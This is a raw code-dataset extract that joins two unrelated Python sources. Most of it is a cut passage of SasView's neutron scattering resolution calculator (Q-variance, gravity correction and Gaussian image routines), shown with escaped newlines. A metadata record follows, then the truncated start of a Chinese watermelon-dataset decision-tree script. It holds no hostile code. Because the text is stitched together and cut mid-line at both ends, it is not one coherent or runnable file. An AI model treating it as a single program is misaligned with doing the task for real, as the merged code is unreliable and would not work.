sqrt(sigma_1)\n self.sigma_lamd = sqrt(sigma_r)\n self.sigma_2 = sqrt(sigma_2)\n self.sigma_1d = sqrt(sigma1d)\n # rescale\n max_im_val = 1\n if max_im_val > 0:\n image_out /= max_im_val\n else:\n image_out = image * 0.0\n # Don't calculate sigmas nor set self.sigmas!\n sigma_1 = 0\n sigma_r = 0\n sigma_2 = 0\n sigma1d = 0\n if len(self.image) > 0:\n self.image += image_out\n else:\n self.image = image_out\n\n # plot image\n return self.plot_image(self.image)\n\n def setup_tof(self, wavelength, wavelength_spread):\n \"\"\"\n Setup all parameters in instrument\n\n : param ind: index of lambda, etc\n \"\"\"\n\n # set wave.wavelength\n self.set_wavelength(wavelength)\n self.set_wavelength_spread(wavelength_spread)\n self.intensity = self.wave.get_intensity()\n\n if wavelength == 0:\n msg = \"Can't compute the resolution: the wavelength is zero...\"\n raise RuntimeError(msg)\n return self.intensity\n\n def compute(self, wavelength, wavelength_spread, qx_value, qy_value,\n coord='cartesian', tof=False):\n \"\"\"\n Compute the Q resoltuion in || and + direction of 2D\n : qx_value: x component of q\n : qy_value: y component of q\n \"\"\"\n coord = 'cartesian'\n lamb = wavelength\n lamb_spread = wavelength_spread\n # the shape of wavelength distribution\n\n if tof:\n # rectangular\n tof_factor = 2\n else:\n # triangular\n tof_factor = 1\n # Find polar values\n qr_value, phi = self._get_polar_value(qx_value, qy_value)\n # vacuum wave transfer\n knot = 2*pi/lamb\n # scattering angle theta; always true for plane detector\n # aligned vertically to the ko direction\n if qr_value > knot:\n theta = pi/2\n else:\n theta = math.asin(qr_value/knot)\n # source aperture size\n rone = self.source_aperture_size\n # sample aperture size\n rtwo = self.sample_aperture_size\n # detector pixel size\n rthree = self.detector_pix_size\n # source to sample(aperture) distance\n l_ssa = self.source2sample_distance[0]\n # sample(aperture) to detector distance\n l_sad = self.sample2detector_distance[0]\n # sample (aperture) to sample distance\n l_sas = self.sample2sample_distance[0]\n # source to sample distance\n l_one = l_ssa + l_sas\n # sample to detector distance\n l_two = l_sad - l_sas\n\n # Sample offset correction for l_one and Lp on variance calculation\n l1_cor = (l_ssa * l_two) / (l_sas + l_two)\n lp_cor = (l_ssa * l_two) / (l_one + l_two)\n # the radial distance to the pixel from the center of the detector\n radius = math.tan(theta) * l_two\n #Lp = l_one*l_two/(l_one+l_two)\n # default polar coordinate\n comp1 = 'radial'\n comp2 = 'phi'\n # in the case of the cartesian coordinate\n if coord == 'cartesian':\n comp1 = 'x'\n comp2 = 'y'\n\n # sigma in the radial/x direction\n # for source aperture\n sigma_1 = self.get_variance(rone, l1_cor, phi, comp1)\n # for sample apperture\n sigma_1 += self.get_variance(rtwo, lp_cor, phi, comp1)\n # for detector pix\n sigma_1 += self.get_variance(rthree, l_two, phi, comp1)\n # for gravity term for 1d\n sigma_1grav1d = self.get_variance_gravity(l_ssa, l_sad, lamb,\n lamb_spread, phi, comp1, 'on') / tof_factor\n # for wavelength spread\n # reserve for 1d calculation\n A_value = self._cal_A_value(lamb, l_ssa, l_sad)\n sigma_wave_1, sigma_wave_1_1d = self.get_variance_wave(A_value,\n radius, l_two, lamb_spread,\n phi, 'radial', 'on')\n sigma_wave_1 /= tof_factor\n sigma_wave_1_1d /= tof_factor\n # for 1d\n variance_1d_1 = (sigma_1 + sigma_1grav1d) / 2 + sigma_wave_1_1d\n # normalize\n variance_1d_1 = knot * knot * variance_1d_1 / 12\n\n # for 2d\n #sigma_1 += sigma_wave_1\n # normalize\n sigma_1 = knot * sqrt(sigma_1 / 12)\n sigma_r = knot * sqrt(sigma_wave_1 / (tof_factor *12))\n # sigma in the phi/y direction\n # for source apperture\n sigma_2 = self.get_variance(rone, l1_cor, phi, comp2)\n\n # for sample apperture\n sigma_2 += self.get_variance(rtwo, lp_cor, phi, comp2)\n\n # for detector pix\n sigma_2 += self.get_variance(rthree, l_two, phi, comp2)\n\n # for gravity term for 1d\n sigma_2grav1d = self.get_variance_gravity(l_ssa, l_sad, lamb,\n lamb_spread, phi, comp2, 'on') / tof_factor\n\n # for wavelength spread\n # reserve for 1d calculation\n sigma_wave_2, sigma_wave_2_1d = self.get_variance_wave(A_value,\n radius, l_two, lamb_spread,\n phi, 'phi', 'on')\n sigma_wave_2 /= tof_factor\n sigma_wave_2_1d /= tof_factor\n # for 1d\n variance_1d_2 = (sigma_2 + sigma_2grav1d) / 2 + sigma_wave_2_1d\n # normalize\n variance_1d_2 = knot * knot * variance_1d_2 / 12\n\n # for 2d\n #sigma_2 = knot*sqrt(sigma_2/12)\n #sigma_2 += sigma_wave_2\n # normalize\n sigma_2 = knot * sqrt(sigma_2 / 12)\n sigma1d = sqrt(variance_1d_1 + variance_1d_2)\n # set sigmas\n self.sigma_1 = sigma_1\n self.sigma_lamd = sigma_r\n self.sigma_2 = sigma_2\n self.sigma_1d = sigma1d\n return qr_value, phi, sigma_1, sigma_2, sigma_r, sigma1d\n\n def _within_detector_range(self, qx_value, qy_value):\n \"\"\"\n check if qvalues are within detector range\n \"\"\"\n # detector range\n detector_qx_min = self.detector_qx_min\n detector_qx_max = self.detector_qx_max\n detector_qy_min = self.detector_qy_min\n detector_qy_max = self.detector_qy_max\n if self.qxmin_limit > detector_qx_min:\n self.qxmin_limit = detector_qx_min\n if self.qxmax_limit < detector_qx_max:\n self.qxmax_limit = detector_qx_max\n if self.qymin_limit > detector_qy_min:\n self.qymin_limit = detector_qy_min\n if self.qymax_limit < detector_qy_max:\n self.qymax_limit = detector_qy_max\n if qx_value < detector_qx_min or qx_value > detector_qx_max:\n return False\n if qy_value < detector_qy_min or qy_value > detector_qy_max:\n return False\n return True\n\n def get_image(self, qx_value, qy_value, sigma_1, sigma_2, sigma_r,\n qx_min, qx_max, qy_min, qy_max,\n coord='cartesian', full_cal=True):\n \"\"\"\n Get the resolution in polar coordinate ready to plot\n : qx_value: qx_value value\n : qy_value: qy_value value\n : sigma_1: variance in r direction\n : sigma_2: variance in phi direction\n : coord: coordinate system of image, 'polar' or 'cartesian'\n \"\"\"\n # Get qx_max and qy_max...\n self._get_detector_qxqy_pixels()\n\n qr_value, phi = self._get_polar_value(qx_value, qy_value)\n\n # Check whether the q value is within the detector range\n if qx_min < self.qx_min:\n self.qx_min = qx_min\n #raise ValueError(msg)\n if qx_max > self.qx_max:\n self.qx_max = qx_max\n #raise ValueError(msg)\n if qy_min < self.qy_min:\n self.qy_min = qy_min\n #raise ValueError(msg)\n if qy_max > self.qy_max:\n self.qy_max = qy_max\n #raise ValueError(msg)\n if not full_cal:\n return None\n\n # Make an empty graph in the detector scale\n dx_size = (self.qx_max - self.qx_min) / (1000 - 1)\n dy_size = (self.qy_max - self.qy_min) / (1000 - 1)\n x_val = np.arange(self.qx_min, self.qx_max, dx_size)\n y_val = np.arange(self.qy_max, self.qy_min, -dy_size)\n q_1, q_2 = np.meshgrid(x_val, y_val)\n #q_phi = numpy.arctan(q_1,q_2)\n # check whether polar or cartesian\n if coord == 'polar':\n # Find polar values\n qr_value, phi = self._get_polar_value(qx_value, qy_value)\n q_1, q_2 = self._rotate_z(q_1, q_2, phi)\n qc_1 = qr_value\n qc_2 = 0.0\n # Calculate the 2D Gaussian distribution image\n image = self._gaussian2d_polar(q_1, q_2, qc_1, qc_2,\n sigma_1, sigma_2, sigma_r)\n else:\n # catesian coordinate\n # qx_center\n qc_1 = qx_value\n # qy_center\n qc_2 = qy_value\n\n # Calculate the 2D Gaussian distribution image\n image = self._gaussian2d(q_1, q_2, qc_1, qc_2,\n sigma_1, sigma_2, sigma_r)\n # out side of detector\n if not self._within_detector_range(qx_value, qy_value):\n image *= 0.0\n self.intensity = 0.0\n #return self.image\n\n # Add it if there are more than one inputs.\n if len(self.image_lam) > 0:\n self.image_lam += image * self.intensity\n else:\n self.image_lam = image * self.intensity\n\n return self.image_lam\n\n def plot_image(self, image):\n \"\"\"\n Plot image using pyplot\n : image: 2d resolution image\n\n : return plt: pylab object\n \"\"\"\n import matplotlib.pyplot as plt\n\n self.plot = plt\n plt.xlabel('$\\\\rm{Q}_{x} [A^{-1}]$')\n plt.ylabel('$\\\\rm{Q}_{y} [A^{-1}]$')\n # Max value of the image\n # max = numpy.max(image)\n qx_min, qx_max, qy_min, qy_max = self.get_detector_qrange()\n\n # Image\n im = plt.imshow(image,\n extent=[qx_min, qx_max, qy_min, qy_max])\n\n # bilinear interpolation to make it smoother\n im.set_interpolation('bilinear')\n\n return plt\n\n def reset_image(self):\n \"\"\"\n Reset image to default (=[])\n \"\"\"\n self.image = []\n\n def get_variance(self, size=[], distance=0, phi=0, comp='radial'):\n \"\"\"\n Get the variance when the slit/pinhole size is given\n : size: list that can be one(diameter for circular) or two components(lengths for rectangular)\n : distance: [z, x] where z along the incident beam, x // qx_value\n : comp: direction of the sigma; can be 'phi', 'y', 'x', and 'radial'\n\n : return variance: sigma^2\n \"\"\"\n # check the length of size (list)\n len_size = len(size)\n\n # define sigma component direction\n if comp == 'radial':\n phi_x = math.cos(phi)\n phi_y = math.sin(phi)\n elif comp == 'phi':\n phi_x = math.sin(phi)\n phi_y = math.cos(phi)\n elif comp == 'x':\n phi_x = 1\n phi_y = 0\n elif comp == 'y':\n phi_x = 0\n phi_y = 1\n else:\n phi_x = 0\n phi_y = 0\n # calculate each component\n # for pinhole w/ radius = size[0]/2\n if len_size == 1:\n x_comp = (0.5 * size[0]) * sqrt(3)\n y_comp = 0\n # for rectangular slit\n elif len_size == 2:\n x_comp = size[0] * phi_x\n y_comp = size[1] * phi_y\n # otherwise\n else:\n raise ValueError(\" Improper input...\")\n # get them squared\n sigma = x_comp * x_comp\n sigma += y_comp * y_comp\n # normalize by distance\n sigma /= (distance * distance)\n\n return sigma\n\n def get_variance_wave(self, A_value, radius, distance, spread, phi,\n comp='radial', switch='on'):\n \"\"\"\n Get the variance when the wavelength spread is given\n\n : radius: the radial distance from the beam center to the pix of q\n : distance: sample to detector distance\n : spread: wavelength spread (ratio)\n : comp: direction of the sigma; can be 'phi', 'y', 'x', and 'radial'\n\n : return variance: sigma^2 for 2d, sigma^2 for 1d [tuple]\n \"\"\"\n if switch.lower() == 'off':\n return 0, 0\n # check the singular point\n if distance == 0 or comp == 'phi':\n return 0, 0\n else:\n # calculate sigma^2 for 1d\n sigma1d = 2 * math.pow(radius/distance*spread, 2)\n if comp == 'x':\n sigma1d *= (math.cos(phi)*math.cos(phi))\n elif comp == 'y':\n sigma1d *= (math.sin(phi)*math.sin(phi))\n else:\n sigma1d *= 1\n # sigma^2 for 2d\n # shift the coordinate due to the gravitational shift\n rad_x = radius * math.cos(phi)\n rad_y = A_value - radius * math.sin(phi)\n radius = math.sqrt(rad_x * rad_x + rad_y * rad_y)\n # new phi\n phi = math.atan2(-rad_y, rad_x)\n self.gravity_phi = phi\n # calculate sigma^2\n sigma = 2 * math.pow(radius/distance*spread, 2)\n if comp == 'x':\n sigma *= (math.cos(phi)*math.cos(phi))\n elif comp == 'y':\n sigma *= (math.sin(phi)*math.sin(phi))\n else:\n sigma *= 1\n\n return sigma, sigma1d\n\n def get_variance_gravity(self, s_distance, d_distance, wavelength, spread,\n phi, comp='radial', switch='on'):\n \"\"\"\n Get the variance from gravity when the wavelength spread is given\n\n : s_distance: source to sample distance\n : d_distance: sample to detector distance\n : wavelength: wavelength\n : spread: wavelength spread (ratio)\n : comp: direction of the sigma; can be 'phi', 'y', 'x', and 'radial'\n\n : return variance: sigma^2\n \"\"\"\n if switch.lower() == 'off':\n return 0\n if self.mass == 0.0:\n return 0\n # check the singular point\n if d_distance == 0 or comp == 'x':\n return 0\n else:\n a_value = self._cal_A_value(None, s_distance, d_distance)\n # calculate sigma^2\n sigma = math.pow(a_value / d_distance, 2)\n sigma *= math.pow(wavelength, 4)\n sigma *= math.pow(spread, 2)\n sigma *= 8\n return sigma\n\n def _cal_A_value(self, lamda, s_distance, d_distance):\n \"\"\"\n Calculate A value for gravity\n\n : s_distance: source to sample distance\n : d_distance: sample to detector distance\n \"\"\"\n # neutron mass in cgs unit\n self.mass = self.get_neutron_mass()\n # plank constant in cgs unit\n h_constant = _PLANK_H\n # gravity in cgs unit\n gravy = _GRAVITY\n # m/h\n m_over_h = self.mass / h_constant\n # A value\n a_value = d_distance * (s_distance + d_distance)\n a_value *= math.pow(m_over_h / 2, 2)\n a_value *= gravy\n # unit correction (1/cm to 1/A) for A and d_distance below\n a_value *= 1.0E-16\n # if lamda is give (broad meanning of A) return 2* lamda^2 * A\n if lamda is not None:\n a_value *= (4 * lamda * lamda)\n return a_value\n\n def get_intensity(self):\n \"\"\"\n Get intensity\n \"\"\"\n return self.wave.intensity\n\n def get_wavelength(self):\n \"\"\"\n Get wavelength\n \"\"\"\n return self.wave.wavelength\n\n def get_default_spectrum(self):\n \"\"\"\n Get default_spectrum\n \"\"\"\n return self.wave.get_default_spectrum()\n\n def get_spectrum(self):\n \"\"\"\n Get _spectrum\n \"\"\"\n return self.wave.get_spectrum()\n\n def get_wavelength_spread(self):\n \"\"\"\n Get wavelength spread\n \"\"\"\n return self.wave.wavelength_spread\n\n def get_neutron_mass(self):\n \"\"\"\n Get Neutron mass\n \"\"\"\n return self.wave.mass\n\n def get_source_aperture_size(self):\n \"\"\"\n Get source aperture size\n \"\"\"\n return self.aperture.source_size\n\n def get_sample_aperture_size(self):\n \"\"\"\n Get sample aperture size\n \"\"\"\n return self.aperture.sample_size\n\n def get_detector_pix_size(self):\n \"\"\"\n Get detector pixel size\n \"\"\"\n return self.detector.pix_size\n\n def get_detector_size(self):\n \"\"\"\n Get detector size\n \"\"\"\n return self.detector.size\n\n def get_source2sample_distance(self):\n \"\"\"\n Get detector source2sample_distance\n \"\"\"\n return self.aperture.sample_distance\n\n def get_sample2sample_distance(self):\n \"\"\"\n Get detector sampleslitsample_distance\n \"\"\"\n return self.sample.distance\n\n def get_sample2detector_distance(self):\n \"\"\"\n Get detector sample2detector_distance\n \"\"\"\n return self.detector.distance\n\n def set_intensity(self, intensity):\n \"\"\"\n Set intensity\n \"\"\"\n self.wave.set_intensity(intensity)\n\n def set_wave(self, wavelength):\n \"\"\"\n Set wavelength list or wavelength\n \"\"\"\n if wavelength.__class__.__name__ == 'list':\n self.wave.set_wave_list(wavelength)\n elif wavelength.__class__.__name__ == 'float':\n self.wave.set_wave_list([wavelength])\n #self.set_wavelength(wavelength)\n else:\n raise TypeError(\"invalid wavlength---should be list or float\")\n\n def set_wave_spread(self, wavelength_spread):\n \"\"\"\n Set wavelength spread or wavelength spread\n \"\"\"\n if wavelength_spread.__class__.__name__ == 'list':\n self.wave.set_wave_spread_list(wavelength_spread)\n elif wavelength_spread.__class__.__name__ == 'float':\n self.wave.set_wave_spread_list([wavelength_spread])\n else:\n raise TypeError(\"invalid wavelength spread---should be list or float\")\n\n def set_wavelength(self, wavelength):\n \"\"\"\n Set wavelength\n \"\"\"\n self.wavelength = wavelength\n self.wave.set_wavelength(wavelength)\n\n def set_spectrum(self, spectrum):\n \"\"\"\n Set spectrum\n \"\"\"\n self.spectrum = spectrum\n self.wave.set_spectrum(spectrum)\n\n def set_wavelength_spread(self, wavelength_spread):\n \"\"\"\n Set wavelength spread\n \"\"\"\n self.wavelength_spread = wavelength_spread\n self.wave.set_wavelength_spread(wavelength_spread)\n\n def set_wave_list(self, wavelength_list, wavelengthspread_list):\n \"\"\"\n Set wavelength and its spread list\n \"\"\"\n self.wave.set_wave_list(wavelength_list)\n self.wave.set_wave_spread_list(wavelengthspread_list)\n\n def get_wave_list(self):\n \"\"\"\n Set wavelength spread\n \"\"\"\n return self.wave.get_wave_list()\n\n def get_intensity_list(self):\n \"\"\"\n Set wavelength spread\n \"\"\"\n return self.wave.get_intensity_list()\n\n def set_source_aperture_size(self, size):\n \"\"\"\n Set source aperture size\n\n : param size: [dia_value] or [x_value, y_value]\n \"\"\"\n if len(size) < 1 or len(size) > 2:\n raise RuntimeError(\"The length of the size must be one or two.\")\n self.aperture.set_source_size(size)\n\n def set_neutron_mass(self, mass):\n \"\"\"\n Set Neutron mass\n \"\"\"\n self.wave.set_mass(mass)\n self.mass = mass\n\n def set_sample_aperture_size(self, size):\n \"\"\"\n Set sample aperture size\n\n : param size: [dia_value] or [xheight_value, yheight_value]\n \"\"\"\n if len(size) < 1 or len(size) > 2:\n raise RuntimeError(\"The length of the size must be one or two.\")\n self.aperture.set_sample_size(size)\n\n def set_detector_pix_size(self, size):\n \"\"\"\n Set detector pixel size\n \"\"\"\n self.detector.set_pix_size(size)\n\n def set_detector_size(self, size):\n \"\"\"\n Set detector size in number of pixels\n : param size: [pixel_nums] or [x_pix_num, yx_pix_num]\n \"\"\"\n self.detector.set_size(size)\n\n def set_source2sample_distance(self, distance):\n \"\"\"\n Set detector source2sample_distance\n\n : param distance: [distance, x_offset]\n \"\"\"\n if len(distance) < 1 or len(distance) > 2:\n raise RuntimeError(\"The length of the size must be one or two.\")\n self.aperture.set_sample_distance(distance)\n\n def set_sample2sample_distance(self, distance):\n \"\"\"\n Set detector sample_slit2sample_distance\n\n : param distance: [distance, x_offset]\n \"\"\"\n if len(distance) < 1 or len(distance) > 2:\n raise RuntimeError(\"The length of the size must be one or two.\")\n self.sample.set_distance(distance)\n\n def set_sample2detector_distance(self, distance):\n \"\"\"\n Set detector sample2detector_distance\n\n : param distance: [distance, x_offset]\n \"\"\"\n if len(distance) < 1 or len(distance) > 2:\n raise RuntimeError(\"The length of the size must be one or two.\")\n self.detector.set_distance(distance)\n\n def get_all_instrument_params(self):\n \"\"\"\n Get all instrumental parameters\n \"\"\"\n self.mass = self.get_neutron_mass()\n self.spectrum = self.get_spectrum()\n self.source_aperture_size = self.get_source_aperture_size()\n self.sample_aperture_size = self.get_sample_aperture_size()\n self.detector_pix_size = self.get_detector_pix_size()\n self.detector_size = self.get_detector_size()\n self.source2sample_distance = self.get_source2sample_distance()\n self.sample2sample_distance = self.get_sample2sample_distance()\n self.sample2detector_distance = self.get_sample2detector_distance()\n\n def get_detector_qrange(self):\n \"\"\"\n get max detector q ranges\n\n : return: qx_min, qx_max, qy_min, qy_max tuple\n \"\"\"\n if len(self.qxrange) != 2 or len(self.qyrange) != 2:\n return None\n qx_min = self.qxrange[0]\n qx_max = self.qxrange[1]\n qy_min = self.qyrange[0]\n qy_max = self.qyrange[1]\n\n return qx_min, qx_max, qy_min, qy_max\n\n def _rotate_z(self, x_value, y_value, theta=0.0):\n \"\"\"\n Rotate x-y cordinate around z-axis by theta\n : x_value: numpy array of x values\n : y_value: numpy array of y values\n : theta: angle to rotate by in rad\n\n :return: x_prime, y-prime\n \"\"\"\n # rotate by theta\n x_prime = x_value * math.cos(theta) + y_value * math.sin(theta)\n y_prime = -x_value * math.sin(theta) + y_value * math.cos(theta)\n\n return x_prime, y_prime\n\n def _gaussian2d(self, x_val, y_val, x0_val, y0_val,\n sigma_x, sigma_y, sigma_r):\n \"\"\"\n Calculate 2D Gaussian distribution\n : x_val: x value\n : y_val: y value\n : x0_val: mean value in x-axis\n : y0_val: mean value in y-axis\n : sigma_x: variance in x-direction\n : sigma_y: variance in y-direction\n\n : return: gaussian (value)\n \"\"\"\n # phi values at each points (not at the center)\n x_value = x_val - x0_val\n y_value = y_val - y0_val\n phi_i = np.arctan2(y_val, x_val)\n\n # phi correction due to the gravity shift (in phi)\n phi_0 = math.atan2(y0_val, x0_val)\n phi_i = phi_i - phi_0 + self.gravity_phi\n\n sin_phi = np.sin(self.gravity_phi)\n cos_phi = np.cos(self.gravity_phi)\n\n x_p = x_value * cos_phi + y_value * sin_phi\n y_p = -x_value * sin_phi + y_value * cos_phi\n\n new_sig_x = sqrt(sigma_r * sigma_r / (sigma_x * sigma_x) + 1)\n new_sig_y = sqrt(sigma_r * sigma_r / (sigma_y * sigma_y) + 1)\n new_x = x_p * cos_phi / new_sig_x - y_p * sin_phi\n new_x /= sigma_x\n new_y = x_p * sin_phi / new_sig_y + y_p * cos_phi\n new_y /= sigma_y\n\n nu_value = -0.5 * (new_x * new_x + new_y * new_y)\n\n gaussian = np.exp(nu_value)\n # normalizing factor correction\n gaussian /= gaussian.sum()\n\n return gaussian\n\n def _gaussian2d_polar(self, x_val, y_val, x0_val, y0_val,\n sigma_x, sigma_y, sigma_r):\n \"\"\"\n Calculate 2D Gaussian distribution for polar coodinate\n : x_val: x value\n : y_val: y value\n : x0_val: mean value in x-axis\n : y0_val: mean value in y-axis\n : sigma_x: variance in r-direction\n : sigma_y: variance in phi-direction\n : sigma_r: wavelength variance in r-direction\n\n : return: gaussian (value)\n \"\"\"\n sigma_x = sqrt(sigma_x * sigma_x + sigma_r * sigma_r)\n # call gaussian1d\n gaussian = self._gaussian1d(x_val, x0_val, sigma_x)\n gaussian *= self._gaussian1d(y_val, y0_val, sigma_y)\n\n # normalizing factor correction\n if sigma_x != 0 and sigma_y != 0:\n gaussian *= sqrt(2 * pi)\n return gaussian\n\n def _gaussian1d(self, value, mean, sigma):\n \"\"\"\n Calculate 1D Gaussian distribution\n : value: value\n : mean: mean value\n : sigma: variance\n\n : return: gaussian (value)\n \"\"\"\n # default\n gaussian = 1.0\n if sigma != 0:\n # get exponent\n nu_value = (value - mean) / sigma\n nu_value *= nu_value\n nu_value *= -0.5\n gaussian *= np.exp(nu_value)\n gaussian /= sigma\n # normalize\n gaussian /= sqrt(2 * pi)\n\n return gaussian\n\n def _atan_phi(self, qy_value, qx_value):\n \"\"\"\n Find the angle phi of q on the detector plane for qx_value, qy_value given\n : qx_value: x component of q\n : qy_value: y component of q\n\n : return phi: the azimuthal angle of q on x-y plane\n \"\"\"\n phi = math.atan2(qy_value, qx_value)\n return phi\n\n def _get_detector_qxqy_pixels(self):\n \"\"\"\n Get the pixel positions of the detector in the qx_value-qy_value space\n \"\"\"\n\n # update all param values\n self.get_all_instrument_params()\n\n # wavelength\n wavelength = self.wave.wavelength\n # Gavity correction\n delta_y = self._get_beamcenter_drop() # in cm\n\n # detector_pix size\n detector_pix_size = self.detector_pix_size\n # Square or circular pixel\n if len(detector_pix_size) == 1:\n pix_x_size = detector_pix_size[0]\n pix_y_size = detector_pix_size[0]\n # rectangular pixel pixel\n elif len(detector_pix_size) == 2:\n pix_x_size = detector_pix_size[0]\n pix_y_size = detector_pix_size[1]\n else:\n raise ValueError(\" Input value format error...\")\n # Sample to detector distance = sample slit to detector\n # minus sample offset\n sample2detector_distance = self.sample2detector_distance[0] - \\\n self.sample2sample_distance[0]\n # detector offset in x-direction\n detector_offset = 0\n try:\n detector_offset = self.sample2detector_distance[1]\n except Exception as exc:\n logger.error(exc)\n\n # detector size in [no of pix_x,no of pix_y]\n detector_pix_nums_x = self.detector_size[0]\n\n # get pix_y if it exists, otherwse take it from [0]\n try:\n detector_pix_nums_y = self.detector_size[1]\n except:\n detector_pix_nums_y = self.detector_size[0]\n\n # detector offset in pix number\n offset_x = detector_offset / pix_x_size\n offset_y = delta_y / pix_y_size\n\n # beam center position in pix number (start from 0)\n center_x, center_y = self._get_beamcenter_position(detector_pix_nums_x,\n detector_pix_nums_y,\n offset_x, offset_y)\n # distance [cm] from the beam center on detector plane\n detector_ind_x = np.arange(detector_pix_nums_x)\n detector_ind_y = np.arange(detector_pix_nums_y)\n\n # shif 0.5 pixel so that pix position is at the center of the pixel\n detector_ind_x = detector_ind_x + 0.5\n detector_ind_y = detector_ind_y + 0.5\n\n # the relative postion from the beam center\n detector_ind_x = detector_ind_x - center_x\n detector_ind_y = detector_ind_y - center_y\n\n # unit correction in cm\n detector_ind_x = detector_ind_x * pix_x_size\n detector_ind_y = detector_ind_y * pix_y_size\n\n qx_value = np.zeros(len(detector_ind_x))\n qy_value = np.zeros(len(detector_ind_y))\n i = 0\n\n for indx in detector_ind_x:\n qx_value[i] = self._get_qx(indx, sample2detector_distance, wavelength)\n i += 1\n i = 0\n for indy in detector_ind_y:\n qy_value[i] = self._get_qx(indy, sample2detector_distance, wavelength)\n i += 1\n\n # qx_value and qy_value values in array\n qx_value = qx_value.repeat(detector_pix_nums_y)\n qx_value = qx_value.reshape(detector_pix_nums_x, detector_pix_nums_y)\n qy_value = qy_value.repeat(detector_pix_nums_x)\n qy_value = qy_value.reshape(detector_pix_nums_y, detector_pix_nums_x)\n qy_value = qy_value.transpose()\n\n # p min and max values among the center of pixels\n self.qx_min = np.min(qx_value)\n self.qx_max = np.max(qx_value)\n self.qy_min = np.min(qy_value)\n self.qy_max = np.max(qy_value)\n\n # Appr. min and max values of the detector display limits\n # i.e., edges of the last pixels.\n self.qy_min += self._get_qx(-0.5 * pix_y_size,\n sample2detector_distance, wavelength)\n self.qy_max += self._get_qx(0.5 * pix_y_size,\n sample2detector_distance, wavelength)\n #if self.qx_min == self.qx_max:\n self.qx_min += self._get_qx(-0.5 * pix_x_size,\n sample2detector_distance, wavelength)\n self.qx_max += self._get_qx(0.5 * pix_x_size,\n sample2detector_distance, wavelength)\n\n # min and max values of detecter\n self.detector_qx_min = self.qx_min\n self.detector_qx_max = self.qx_max\n self.detector_qy_min = self.qy_min\n self.detector_qy_max = self.qy_max\n\n # try to set it as a Data2D otherwise pass (not required for now)\n try:\n from sasdata.dataloader.data_info import Data2D\n output = Data2D()\n inten = np.zeros_like(qx_value)\n output.data = inten\n output.qx_data = qx_value\n output.qy_data = qy_value\n except Exception as exc:\n logger.error(exc)\n\n return output\n\n def _get_qx(self, dx_size, det_dist, wavelength):\n \"\"\"\n :param dx_size: x-distance from beam center [cm]\n :param det_dist: sample to detector distance [cm]\n\n :return: q-value at the given position\n \"\"\"\n # Distance from beam center in the plane of detector\n plane_dist = dx_size\n # full scattering angle on the x-axis\n theta = np.arctan(plane_dist / det_dist)\n qx_value = (2.0 * pi / wavelength) * np.sin(theta)\n return qx_value\n\n def _get_polar_value(self, qx_value, qy_value):\n \"\"\"\n Find qr_value and phi from qx_value and qy_value values\n\n : return qr_value, phi\n \"\"\"\n # find |q| on detector plane\n qr_value = sqrt(qx_value*qx_value + qy_value*qy_value)\n # find angle phi\n phi = self._atan_phi(qy_value, qx_value)\n\n return qr_value, phi\n\n def _get_beamcenter_position(self, num_x, num_y, offset_x, offset_y):\n \"\"\"\n :param num_x: number of pixel in x-direction\n :param num_y: number of pixel in y-direction\n :param offset: detector offset in x-direction in pix number\n\n :return: pix number; pos_x, pos_y in pix index\n \"\"\"\n # beam center position\n pos_x = num_x / 2\n pos_y = num_y / 2\n\n # correction for offset\n pos_x += offset_x\n # correction for gravity that is always negative\n pos_y -= offset_y\n\n return pos_x, pos_y\n\n def _get_beamcenter_drop(self):\n \"\"\"\n Get the beam center drop (delta y) in y diection due to gravity\n\n :return delta y: the beam center drop in cm\n \"\"\"\n # Check if mass == 0 (X-ray).\n if self.mass == 0:\n return 0\n # Covert unit from A to cm\n unit_cm = 1e-08\n # Velocity of neutron in horizontal direction (~ actual velocity)\n velocity = _PLANK_H / (self.mass * self.wave.wavelength * unit_cm)\n # Compute delta y\n delta_y = 0.5\n delta_y *= _GRAVITY\n sampletodetector = self.sample2detector_distance[0] - \\\n self.sample2sample_distance[0]\n delta_y *= sampletodetector\n delta_y *= (self.source2sample_distance[0] + self.sample2detector_distance[0])\n delta_y /= (velocity * velocity)\n\n return delta_y\n","repo_name":"SasView/sasview","sub_path":"src/sas/sascalc/calculator/resolution_calculator.py","file_name":"resolution_calculator.py","file_ext":"py","file_size_in_byte":39427,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"42287581296","text":"import math\r\nfrom copy import copy\r\nfrom graphviz import Digraph\r\nfrom typing import List\r\nimport PlotTree as pt\r\n\r\n\r\n# 建立数据集\r\ndef createDataSet():\r\n dataSet = [\r\n # 1\r\n ['青绿', '蜷缩', '浊响', '清晰', '凹陷', '硬滑', '好瓜'],\r\n # 2\r\n ['乌黑', '蜷缩', '沉闷', '清晰', '凹陷', '硬滑', '好瓜'],\r\n # 3\r\n ['乌黑', '蜷缩', '浊响', '清晰', '凹陷', '硬滑', '好瓜'],\r\n # 4\r\n ['青绿', '蜷缩', '沉闷', '清晰', '凹陷', '硬滑', '好瓜'],\r\n # 5\r\n ['浅白', '蜷缩', '浊响', '清晰', '凹陷', '硬滑', '好瓜'],\r\n # 6\r\n ['青绿', '稍蜷', '浊响', '清晰', '稍凹', '软粘', '好瓜'],\r\n # 7\r\n ['乌黑', '稍蜷', '浊响', '稍糊', '稍凹', '软粘', '好瓜'],\r\n # 8\r\n ['乌黑', '稍蜷', '浊响', '清晰', '稍凹', '硬滑', '好瓜'],\r\n # 9\r\n ['乌黑', '稍蜷', '沉闷', '稍糊', '稍凹', '硬滑', '坏瓜'],\r\n # 10\r\n ['青绿', '硬挺', '清脆', '清晰', '平坦', '软粘', '坏瓜'],\r\n # 11\r\n ['浅白', '硬挺', '清脆', '模糊', '平坦', '硬滑', '坏瓜'],\r\n # 12\r\n ['浅白', '蜷缩', '浊响', '模糊', '平坦', '软粘', '坏瓜'],\r\n # 13\r\n ['青绿', '稍蜷', '浊响', '稍糊', '凹陷', '硬滑', '坏瓜'],\r\n # 14\r\n ['浅白', '稍蜷', '沉闷', '稍糊', '凹陷', '硬滑', '坏瓜'],\r\n # 15\r\n ['乌黑', '稍蜷', '浊响', '清晰', '稍凹', '软粘', '坏瓜'],\r\n # 16\r\n ['浅白', '蜷缩', '浊响', '模糊', '平坦', '硬滑', '坏瓜'],\r\n # 17\r\n ['青绿', '蜷缩', '沉闷', '稍糊', '稍凹', '硬滑', '坏瓜']\r\n ]\r\n\r\n # 特征值列表\r\n labels = ['色泽', '根蒂', '敲击', '纹理', '脐部', '触感']\r\n\r\n # 特征对应的所有可能的情况\r\n labels_full = {}\r\n\r\n for i in range(len(labels)):\r\n labelList = [example[i] for example in dataSet]\r\n uniqueLabel = set(labelList)\r\n 